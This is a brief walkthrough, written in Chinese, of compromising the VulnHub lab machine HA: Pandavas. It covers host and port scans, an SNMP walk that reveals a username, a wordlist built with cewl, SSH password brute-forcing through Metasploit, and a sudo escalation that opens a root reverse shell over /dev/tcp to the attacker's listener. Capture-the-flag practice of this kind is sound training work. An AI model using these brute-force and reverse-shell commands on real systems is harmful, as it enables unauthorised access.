vulnhub之ha-pandavas的實踐
今天實踐的是vulnhub的ha-pandavas鏡像,
下載地址,https://download.vulnhub.com/ha/pandavas.zip,
用workstation打開,首先做地址掃描,
sudo netdiscover -r 192.168.177.0/24,
獲取到靶機地址192.168.177.135,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.135

再繼續做udp端口的掃描,sudo nmap -sU -p161 192.168.177.135,

有snmp服務,walk一下,snmpwalk -v1 -c public 192.168.177.135,

獲取到用戶名,karna,
有web服務,瀏覽器訪問,http://192.168.177.135,

爬取字典,cewl http://192.168.177.135 > dict.txt,
使用metasploit進行ssh暴力破解,msfconsole,
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.177.135
set USERNAME karna
set PASS_FILE /home/kali/dict.txt
exploit

獲取到karna/Surya,直接ssh登錄,
ssh karna@192.168.177.135,

查看到其它賬戶,暴力破解改名,set USERNAME krishna,

繼續獲取到krishna/Bhagavad,切到krishna,
sudo -l確認可以root身份執行任何程序,
kali攻擊機那邊用nc開個反彈shell監聽,nc -lvp 4444,
靶機這邊執行,sudo -u root bash -i >& /dev/tcp/192.168.177.131/4444 0>&1,

kali攻擊機這邊獲取到反彈shell,確認是root,

本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束。